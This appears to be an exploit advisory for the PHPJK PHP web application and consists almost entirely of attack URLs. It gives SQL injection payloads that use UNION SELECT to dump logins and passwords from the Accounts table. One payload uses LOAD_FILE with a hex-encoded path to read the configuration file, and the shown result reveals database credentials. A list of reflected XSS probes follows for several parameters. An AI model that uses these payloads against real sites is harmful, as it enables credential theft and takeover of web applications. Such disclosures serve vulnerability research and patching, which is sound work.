http://www.example.com/PHPJK/G_Display.php?iCategoryUnq=-1/**/union/**/select/**/1,2,Password,4,5,6/**/from/**/Accounts/* http://www.example.com/PHPJK/Search/DisplayResults.php?DOMAIN_Link=&iSearchID=-1+UNION+SELECT+1,1,1,1,Login,1,Password,1,1,1,1,1,1,1+FROM+Accounts/* Read database credentials: http://www.example.com/PHPJK/G_Display.php?iCategoryUnq=-1/**/union/**/select/**/1,2,LOAD_FILE(0x2F7573722F6C6F63616C2F617061636865322F6874646F63732F5048504A4B2F436F6E66696 775726174696F6E732F5048504A4B5F436F6E6669672E706870),4,5,6/**/from/**/Accounts/* // Result (in the page source code): $sUseDB = "MYSQL"; $sDatabaseName = "phpjk"; $sDatabaseServer = "localhost"; $sDatabaseLogin = "my_user"; $sDatabasePassword = "my_password"; Note: (0x2F75......... = /usr/local/apache2/htdocs/PHPJK/Configurations/PHPJK_Config.php) XSS (GET): http://www.example.com/PHPJK/G_Display.php?iCategoryUnq='"> http://www.example.com/PHPJK/G_Display.php?iDBLoc='"> http://www.example.com/PHPJK/G_Display.php?iTtlNumItems='"> http://www.example.com/PHPJK/G_Display.php?&iNumPerPage='"> http://www.example.com/PHPJK/G_Display.php?sSort='"> http://www.example.com/PHPJK/UserArea/Authenticate.php?sUName='"> http://www.example.com/PHPJK/UserArea/NewAccounts/index.php?sAccountUnq='">